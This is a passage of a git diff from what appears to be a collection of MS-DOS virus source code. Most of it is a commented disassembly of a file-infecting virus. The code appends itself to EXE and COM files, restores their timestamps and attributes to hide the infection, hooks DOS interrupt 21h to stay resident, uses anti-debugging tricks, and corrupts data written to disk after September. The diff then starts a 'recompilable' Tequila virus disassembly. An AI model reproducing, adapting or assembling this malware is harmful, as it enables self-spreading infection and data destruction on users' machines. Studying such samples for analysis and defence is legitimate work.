+;================================================================ +; Get/Set file daye & time +;---------------------------------------------------------------- +s_13F4 proc near + mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B + mov ah,57h ;get/set file date & time ;13F8 B4 57 + int 21h ;13FA CD 21 + retn ;13FC C3 +s_13F4 endp + +;================================================================ +; Contamine File - master routine +;---------------------------------------------------------------- +s_13FD proc near + mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00 + nop ;1402 90 + mov al,0 ;1403 B0 00 + call s_13A8 ;Get victim attribute ;1405 E8 FFA0 + jc l_146A ;-> EXIT ;1408 72 60 + mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F + mov cx,20h ;140E B9 0020 + mov al,1 ;1411 B0 01 + call s_13A8 ;Set victim attribute ;1413 E8 FF92 + jc l_146A ;-> EXIT ;1416 72 52 + jmp short l_1421 ;1418 EB 07 + nop ;141A 90 + +d_009B dw 0005h ;file handle ;141B 05 00 +d_009D dw 0400h ;141D 00 04 +d_009F dw 057Fh ;filepath address ;141F 7F 05 + +l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05 + mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F + mov ax,400h ;142C B8 0400 + mov ds:[9Dh],ax ;l_141D ;142F A3 009D + mov al,2 ;1432 B0 02 + mov ah,3Dh ;open file, al=mode ;1434 B4 3D + int 21h ;1436 CD 21 + mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF + jc l_1443 ;143E 72 03 + mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B +l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B + cmp ax,0FFFFh ;1446 3D FFFF + je l_146A ;-> EXIT, open file err ;1449 74 1F + mov al,0 ;144B B0 00 + call s_13F4 ;Get file daye & time ;144D E8 FFA4 + jc l_148F ;-> err, close & exit ;1450 72 3D + mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8 + mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED + call s_13BF ;Read 32 B into buffer ;145A E8 FF62 + mov ax,word ptr ds:[4F7h] ;l_1877 first file word 
;145D A1 04F7 + cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D + je l_146F ;-> yes, EXE ;1463 74 0A + jmp l_1616 ;-> no, COM ;1465 E9 01AE + +d_00E8 dw 0EF8h ;victim date ;1468 F8 0E + +l_146A: jmp l_15C6 ;146A E9 0159 + +d_00ED dw 0001h ;victim time ;146D 01 00 + +;================================================================ +; EXE file contamination +;---------------------------------------------------------------- +l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509 + neg ax ;1472 F7 D8 + cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9 + je l_148F ;-> allready infected ;1478 74 15 + mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB + cmp ax,3 ;147D 3D 0003 + jb l_148F ;-> file to small ;1480 72 0D + mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF + mov cl,4 ;1485 B1 04 + shl ax,cl ;1487 D3 E0 + mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347 + jmp short l_1492 ;148C EB 04 + nop ;148E 90 + +l_148F: jmp l_15A8 ;148F E9 0116 + +l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B + mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4 + mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028 + call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F + push ax ;14A1 50 + push dx ;14A2 52 + sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347 + sbb dx,0 ;14A7 83 DA 00 + mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439 + mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437 + cmp dx,0 ;14B1 83 FA 00 + ja l_14D3 ;-> more then 64KB ;14B4 77 1D + cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B + ja l_14D3 ;-> more then 28h length;14BA 77 17 + + ;<- EXE code length =< 28h + mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000 + mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B + sub bx,ax ;28h - file length ;14C6 2B D8 + mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343 + mov ds:[513h],bx ;+1Ch = ? 
;14CC 89 1E 0513 + jmp short l_1511 ;14D0 EB 3F + nop ;14D2 90 + +l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B + sbb dx,0 ;14D7 83 DA 00 + mov ds:[345h],ax ;d_16C5 ;14DA A3 0345 + and ax,0Fh ;14DD 25 000F + cmp ax,0 ;14E0 3D 0000 + jne l_14F9 ;-> need aligment ;14E3 75 14 + + mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000 + mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345 + mov cx,10h ;14EE B9 0010 + div cx ;14F1 F7 F1 + mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345 + jmp short l_1511 ;14F6 EB 19 + db 90h ;14F8 90 + + ;<---- need alignment +l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010 + sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343 + mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345 + mov cx,10h ;1506 B9 0010 + div cx ;1509 F7 F1 + add ax,1 ;+ alignment paragraph ;150B 05 0001 + mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345 + +l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D + mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6 + mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345 + mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D + push ax ;151D 50 + mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505 + mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1 + pop ax ;1524 58 + mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505 + mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507 + mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3 + lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612 + add ax,1Eh ;virus stack ;1532 05 001E + add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343 + mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507 + call s_13E8 ;Calculate virus length ;153C E8 FEA9 + pop dx ;<- victim EOF ;153F 5A + pop ax ;1540 58 + add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341 + adc dx,0 ;1545 83 D2 00 + add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343 + adc dx,0 ;154C 83 D2 00 + mov cx,200h ;page length ;154F B9 0200 + div cx 
;1552 F7 F1 + cmp dx,0 ;1554 83 FA 00 + je l_155A ;1557 74 01 + inc ax ;1559 40 +l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB + mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9 + neg dx ;1561 F7 DA + mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509 + mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F + mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B + cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03 + jb l_1580 ;1573 72 0B + + ;<- file begins with jump + mov cx,28h ;1575 B9 0028 + sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343 + mov word ptr ds:[50Bh],cx ;157C 89 0E 050B + +l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C + call s_13D1 ;Write 32 B into file ;1583 E8 FE4B + jc l_15A8 ;-> error, EXIT ;1586 72 20 + mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343 + sub cx,3 ;jmp instruction length ;158C 83 E9 03 + mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F + mov bx,28h ;beginning of code ;1592 BB 0028 + sub ax,bx ;jmp distance ;1595 2B C3 + add cx,ax ;aligning bytes ;1597 03 C8 + mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C + call s_13B0 ;Move file ptr to EOF ;159D E8 FE10 + call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024 + jc l_15A8 ;-> error, EXIT ;15A3 72 03 + call s_15FE ;Write const part of vir;15A5 E8 0056 + +;================================================================ +; End of contamination (common to EXE & COM) +;---------------------------------------------------------------- +l_15A8: mov al,1 ;to set ;15A8 B0 01 + mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8 + mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED + call s_13F4 ;Set file daye & time ;15B2 E8 FE3F + + mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B + mov ah,3Eh ;close file ;15B9 B4 3E + int 21h ;15BB CD 21 + + mov al,1 ;to set ;15BD B0 01 + mov cx,ds:[33Fh] ;l_16BF oryg. 
file attr ;15BF 8B 0E 033F + call s_13A8 ;Set victim attribute ;15C3 E8 FDE2 + +l_15C6: retn ;15C6 C3 + +;================================================================ +; Align end of file to paragraphs +;---------------------------------------------------------------- +s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008 + mov es,ax ;15CA 8E C0 + mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343 + mov dx,54Bh ;offset d_18CB ;15D0.BA 054B + mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B + mov ah,40h ;write file ;15D8 B4 40 + int 21h ;15DA CD 21 + mov cx,ax ;15DC 8B C8 + retn ;15DE C3 + +;================================================================ +; Set file pointer to BOF +;---------------------------------------------------------------- +s_15DF: xor cx,cx ;15DF 33 C9 + xor dx,dx ;15E1 33 D2 + mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200 + mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B + int 21h ;15EB CD 21 + retn ;15ED C3 + +;================================================================ +; COM virus start code pattern +;---------------------------------------------------------------- +d_026E: mov ax,es ;15EE 8C C0 + add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E + jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C +d_027A dw 0 ;15FA 00 00 +d_027C dw 0138h ;15FC 38 01 + +;================================================================ +; Write constant part of virus +;---------------------------------------------------------------- +s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008 + mov es,ax ;1601 8E C0 + mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341 + mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028 + mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B + mov ah,40h ;write file ;160F B4 40 + int 21h ;1611 CD 21 + mov cx,ax ;1613 8B C8 + retn ;1615 C3 + +;================================================================ +; COM victim contamination 
+;---------------------------------------------------------------- +l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E + je l_15A8 ;-> contamined, EXIT ;161C 74 8A + call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F + cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8 + jb l_169F ;-> bellow, EXIT ;1624 72 79 + add ax,100h ;add PSP ;1626 05 0100 + adc dx,0 ;1629 83 D2 00 + push ax ;162C 50 + and ax,0Fh ;162D 25 000F + mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000 + cmp ax,0 ;1636 3D 0000 + je l_1645 ;-> para aligned file ;1639 74 0A + mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010 + sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343 +l_1645: pop ax ;1645 58 + add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343 + adc dx,0 ;164A 83 D2 00 + cmp dx,0 ;164D 83 FA 00 + ja l_169F ;-> file to big, EXIT ;1650 77 4D + mov cl,4 ;1652 B1 04 + shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8 + cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00 + mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C + mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000 + call s_15DF ;Set file pointer to BOF;1664 E8 FF78 + mov ax,8 ;to switch off virus ;1667 B8 0008 + mov es,ax ;166A 8E C0 + mov cx,20h ;bytes to write ;166C B9 0020 + mov dx,26Eh ;offset l_15EE ;166F.BA 026E + mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B + mov ah,40h ;write file ;1677 B4 40 + int 21h ;1679 CD 21 + mov cx,ax ;bytes written ;167B 8B C8 + call s_13B0 ;Move file ptr to EOF ;167D E8 FD30 + call s_15C7 ;write aligning bytes ;1680 E8 FF44 + + mov ax,8 ;switch off virus ;1683 B8 0008 + mov es,ax ;1686 8E C0 + mov cx,28h ;40 bytes ;1688 B9 0028 + mov dx,322h ;offset l_16A2 ;168B .BA 0322 + mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B + mov ah,40h ;write file ;1693 B4 40 + int 21h ;1695 CD 21 + mov cx,ax ;bytes written ;1697 8B C8 + call s_13E8 ;Calculate virus length ;1699 E8 FD4C + call s_15FE ;Write 
const part of vir;169C E8 FF5F +l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06 +s_13FD endp + + ;<-- COM type virus begin pattern +d_0322: push ds ;16A2 1E + push cs ;16A3 0E + pop ds ;16A4 1F + lea si,cs:[4F7h] ;16A5 8D 36 04F7 + mov di,0100h ;16A9.BF 0100 + mov cx,20h ;16AC B9 0020 + rep movsb ;16AF F3/ A4 + mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF + nop ;16B7 90 + pop ds ;16B8 1F + lea ax,cs:[54Fh] ;16B9 8D 06 054F + jmp ax ;16BD FF E0 + +;------ work area +d_033F dw 0020h ;oryg. file attr ;16BF 20 00 +d_0341 dw 05EAh ;const virus code length;16C1 EA 05 +d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00 +d_0345 dw 28h ;16C5 28 00 +d_0347 dw 200h ;size of header ;16C7 00 02 +d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00 + +;================================================================ +; init registers +;---------------------------------------------------------------- +s_16CA proc near + xor si,si ;16CA 33 F6 + xor di,di ;16CC 33 FF + xor ax,ax ;16CE 33 C0 + xor dx,dx ;16D0 33 D2 + xor bp,bp ;16D2 33 ED + retn ;16D4 C3 +s_16CA endp + +;================================================================ +; int 24h handling routine (infection time active only) +;---------------------------------------------------------------- +l_16D5: cmp di,0 ;16D5 83 FF 00 + jne l_16DD ;16D8 75 03 + mov al,3 ;ignore ;16DA B0 03 + iret ;16DC CF + +l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362 + +d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D + +;================================================================ +; Get int 24h +;---------------------------------------------------------------- +s_16E6 proc near + cli ; Disable interrupts ;16E6 FA + xor bx,bx ;16E7 33 DB + mov es,bx ;16E9 8E C3 + mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090 + mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362 + mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092 + mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364 + mov word ptr 
es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355 + mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092 + sti ;170A FB + retn ;170B C3 +s_16E6 endp + + +;================================================================ +; Restore int 24h vector +;---------------------------------------------------------------- +s_170C proc near + cli ;170C FA + xor bx,bx ;170D 33 DB + mov es,bx ;170F 8E C3 + mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362 + mov es:[90h],bx ;1716 26: 89 1E 0090 + mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364 + mov es:[92h],bx ;1720 26: 89 1E 0092 + sti ;1725 FB + retn ;1726 C3 +s_170C endp + +;=============================================================== +; write handle service routine (destruction routine) +;--------------------------------------------------------------- +s_1727 proc near + push ax ;1727 50 + push bx ;1728 53 + push cx ;1729 51 + push dx ;172A 52 + push es ;172B 06 + push ds ;172C 1E + push si ;172D 56 + push di ;172E 57 + mov ax,es ;172F 8C C0 + cmp ax,8 ;1731 3D 0008 + je l_1750 ;-> virus contamination ;1734 74 1A + cmp bx,4 ;1736 83 FB 04 + jb l_1750 ;-> BIOS ;1739 72 15 + mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A + int 21h ;173D CD 21 + cmp dh,9 ;september ? 
;173F 80 FE 09 + jb l_1750 ;-> bellow ;1742 72 0C + pop di ;1744 5F + pop si ;1745 5E + pop ds ;1746 1F + pop es ;1747 07 + pop dx ;1748 5A + pop cx ;1749 59 + pop bx ;174A 5B + pop ax ;174B 58 + add dx,0Ah ;shift buffer address ;174C 83 C2 0A + retn ;174F C3 + +l_1750: pop di ;1750 5F + pop si ;1751 5E + pop ds ;1752 1F + pop es ;1753 07 + pop dx ;1754 5A + pop cx ;1755 59 + pop bx ;1756 5B + pop ax ;1757 58 + retn ;1758 C3 +s_1727 endp + + db 16 dup (0) ;not used ;1759 0010[00] + +;================================================================ +; Load & Execute service routine +;---------------------------------------------------------------- +s_1769 proc near + push ax ;1769 50 + push bx ;176A 53 + push cx ;176B 51 + push dx ;176C 52 + push es ;176D 06 + push ds ;176E 1E + push si ;176F 56 + push di ;1770 57 + mov si,dx ;file pathname ;1771 8B F2 + mov ax,cs ;1773 8C C8 + mov es,ax ;1775 8E C0 + mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F + mov cx,19h ;177A B9 0019 + rep movsb ;copy victim name ;177D F3/ A4 + call s_16E6 ;Get int 24h vector ;177F E8 FF64 + mov ds,ax ;ds:=cs ;1782 8E D8 + call s_13FD ;1784 E8 FC76 + call s_170C ;Restore int 24h vector ;1787 E8 FF82 + pop di ;178A 5F + pop si ;178B 5E + pop ds ;178C 1F + pop es ;178D 07 + pop dx ;178E 5A + pop cx ;178F 59 + pop bx ;1790 5B + pop ax ;1791 58 + retn ;1792 C3 +s_1769 endp + +;================================================================ +; New int 21h service routine +;---------------------------------------------------------------- + ;<---- 10 bytes to identify resident virus +d_0413: pushf ;1793 9C + cmp ah,40h ;write handle ? ;1794 80 FC 40 + jne l_179F ;-> no ;1797 75 06 + call s_1727 ;write handle service routine ;1799 E8 FF8B + jmp short l_17A7 ;179C EB 09 + nop ;179E 90 + +l_179F: cmp ah,4Bh ;Load & Execute ? 
;179F 80 FC 4B + jne l_17A7 ;-> no ;17A2 75 03 + call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2 +l_17A7: popf ;17A7 9D + +;================================================================ +; Execute substituted code and jump into old int 21h service +;---------------------------------------------------------------- + ;<- four bytes from int 21h service +d_0428: cmp ah,51h ;17A8 80 FC 51 +d_042B: je l_17B2 ;17AB 74 05 + jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547 +l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D + +d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02 + +;================================================================ +; Make virus resident +;---------------------------------------------------------------- +s_17BB proc near + cli ;disable interrupts ;17BB FA + push es ;17BC 06 + lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413 + mov di,si ;17C1 8B FE + mov cx,9800h ;resident virus segment ;17C3 B9 9800 + mov es,cx ;17C6 8E C1 + mov cx,0Ah ;17C8 B9 000A + repe cmpsb ;17CB F3/ A6 + cmp cx,0 ;17CD 83 F9 00 + pop es ;17D0 07 + jz l_181A ;-> allready resident ;17D1 74 47 + mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084 + mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086 + mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549 + mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F + mov di,bx ;17E2 8B FB + mov es,ax ;17E4 8E C0 + mov cx,80h ;17E6 B9 0080 + mov al,80h ;17E9 B0 80 +l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE + cmp cx,0 ;17ED 83 F9 00 + je l_1870 ;-> not found, EXIT ;17F0 74 7E + cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC + jne l_17EB ;-> find another place ;17F6 75 F3 + + ;<- get four bytes from int 21h service + mov al,es:[di+2] ;17F8 26: 8A 45 02 + mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B + mov al,es:[di-1] ;1800 26: 8A 45 FF + mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428 + mov al,es:[di] ;1808 26: 8A 05 + mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429 + mov al,es:[di+1] ;180F 26: 8A 45 01 + 
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A + jmp short l_1821 ;1817 EB 08 + nop ;1819 90 + + ;<- allready resident +l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54 + nop ;181C 90 + +d_049D dw 140Dh ;address to jump1 into ;181D 0D 14 +d_049F dw 0278h ;old int 21h segment ;181F 78 02 + +l_1821: mov ax,di ;1821 8B C7 + add ax,4 ;next to conditional jmp;1823 05 0004 + xor bx,bx ;1826 33 DB + mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03 + add ax,bx ;jump address ;182C 03 C3 + mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D + cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80 + jb l_183E ;-> forward jump ;1836 72 06 + ;<- jump backwards + sub ax,100h ;minus carry ;1838 2D 0100 + mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D +l_183E: add di,4 ;second condition addrs ;183E 83 C7 04 + mov word ptr ds:[547h],di ;1841 89 3E 0547 + sub di,5 ;<- area to substitute ;1845 83 EF 05 + push es ;1848 06 + push di ;1849 57 + mov dx,9800h ;resident virus segment ;184A BA 9800 + mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5 + mov es,dx ;1852 8E C2 + xor si,si ;1854 33 F6 + xor di,di ;1856 33 FF + mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612 + rep movsb ;copy virus code ;185B F3/ A4 + + ;<----- take control over int 21h + lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413 + mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3 + pop di ;1865 5F + pop es ;1866 07 + mov cx,5 ;1867 B9 0005 + lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2 + rep movsb ;186E F3/ A4 +l_1870: sti ;1870 FB + retn ;1871 C3 +s_17BB endp + + ;<---- instruction pattern to write over int 21h code +d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA +d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00 +d_04F5 dw 9800h ;resident virus segment ;1875 00 98 + +;================================================ +; saved 32 victim bytes +;------------------------------------------------ +d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11 + db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72 + ;1880 74 65 64 00 00 00 00 + db 'MZ' ;1887 4D 5A + db 
0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00 + db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF + db 98h,00h ;1895 98 00 00 + +;----------------------------------- + db 48 dup (0) ;not used ;1897 0030[00] + +d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14 +d_0549 dw 0278h ;old int 21h segment ;18C9 78 02 + + ;<------ code writed to in case of paragraf alignement + db 0E9h ;jmp l_18CF ;18CB E9 +d_054C dw 052Ch ;distance of jump ;18CC 2C 05 + db 0 ;18CE 00 + +;================================================================ +; EXE virus entry +;---------------------------------------------------------------- +l_18CF: push bx ;18CF 53 + push cx ;18D0 51 + push es ;18D1 06 + push ds ;18D2 1E + pushf ;18D3 9C + mov ax,cs ;18D4 8C C8 + mov ds,ax ;18D6 8E D8 + call s_1938 ;make virus resident ;18D8 E8 005D + cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF + je l_18E5 ;18E0 74 03 + jmp short l_1953 ;-> ? ;18E2 EB 6F + nop ;18E4 90 + +;================================================================ +; End of virus code - file *.COM +;---------------------------------------------------------------- +l_18E5: popf ;18E5 9D + pop ds ;18E6 1F + pop es ;18E7 07 + pop cx ;18E8 59 + pop bx ;18E9 5B + mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100 + mov ax,es ;18F1 8C C0 + mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6 + call s_16CA ;init registers ;18F7 E8 FDD0 + jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4 + + ;<--- victim name +d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53 + ;1905 2E 43 4F 4D + db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00 + db 9 dup (0) ;190F 0009[00] + +;================================================================ +; ANTYDEBUG - make virus resident +;---------------------------------------------------------------- +s_1918 proc near + cmp ax,3000h ;1918 3D 3000 + jne l_1925 ;-> int 3 ;191B 75 08 + call s_17BB ;-> make virus resident ;191D E8 FE9B + retn ;1920 C3 
+s_1918 endp + +d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00 +d_05A3 dw 1388h ;victim SP ;1923 88 13 + +;================================================================ +; ANTYDEBUG - call int 3 (Breakpoint) +;---------------------------------------------------------------- +s_1925 proc near +l_1925: mov ax,3000h ;Flag register ;1925 B8 3000 + push ax ;1928 50 +l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C + cmp ax,3000h ;192E 3D 3000 + jne l_1929 ;1931 75 F6 + retn ;1933 C3 +s_1925 endp + +d_05B4 dw 0000h ;victim IP ;1934 00 00 +d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00 + +;================================================================ +; Make virus resident +;---------------------------------------------------------------- +s_1938 proc near + push es ;1938 06 + call s_1948 ;-> INT 1 (single step) ;1939 E8 000C + cmp ax,0 ;193C 3D 0000 + jne l_1947 ;193F 75 06 + call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1 + call s_1918 ;-> reside virus ;1944 E8 FFD1 +l_1947: pop es ;1947 07 + +;================================================================ +; ANTYDEBUG - call int 1 = Single Step +;---------------------------------------------------------------- +s_1948: pushf ;1948 9C + xor ax,ax ;1949 33 C0 + mov es,ax ;194B 8E C0 + call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004 + retn ;1952 C3 +s_1938 endp + +;================================================================ +; End of virus code - file *.EXE +;---------------------------------------------------------------- +l_1953: popf ;1953 9D + pop ds ;1954 1F + pop es ;1955 07 + pop cx ;1956 59 + pop bx ;1957 5B + mov ax,es ;1958 8C C0 + add ax,10h ;relocating value ;195A 05 0010 + mov dx,ax ;195D 8B D0 + mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1 + add bp,ax ;1964 03 E8 + mov ss,bp ;1966 8E D5 + mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3 + mov sp,bp ;196D 8B E5 + mov ax,dx ;196F 8B C2 + add word ptr cs:[5B6h],ax ;l_1936 - CS 
relocation ;1971 2E: 01 06 05B6 + call s_16CA ;init registers ;1976 E8 FD51 + jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4 + + db 20 dup (0) ;COM file stack ;197E 0014[00] + +d_0612 label byte ;1992h + +seg_a ends + + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tequila.asm b/MSDOS/Virus.MSDOS.Unknown.tequila.asm new file mode 100644 index 00000000..21c7eba8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tequila.asm 
@@ -0,0 +1,1089 @@
+ ;=============================
+ ; the tequila virus =
+ ; a recompilable =
+ ; dis-assembly =
+ ; specifically designed =
+ ; for assembly to a COM file =
+ ; with the A86 assembler. =
+ ; ++++++++++++++++++ =
+ ; If you desire a "perfect" =
+ ; byte for byte source code =
+ ;match-up, the MASM assembler=
+ ; must be used and the noted =
+ ;instructions must be changed=
+ ; to comply with MASM syntax.=
+ ; In addition, all byte and =
+ ;word pointer references must=
+ ; be changed from B and W to =
+ ; BYTE POINTER and WORD =
+ ; POINTER. =
+ ;=============================
+
+
+CODE_SEG SEGMENT
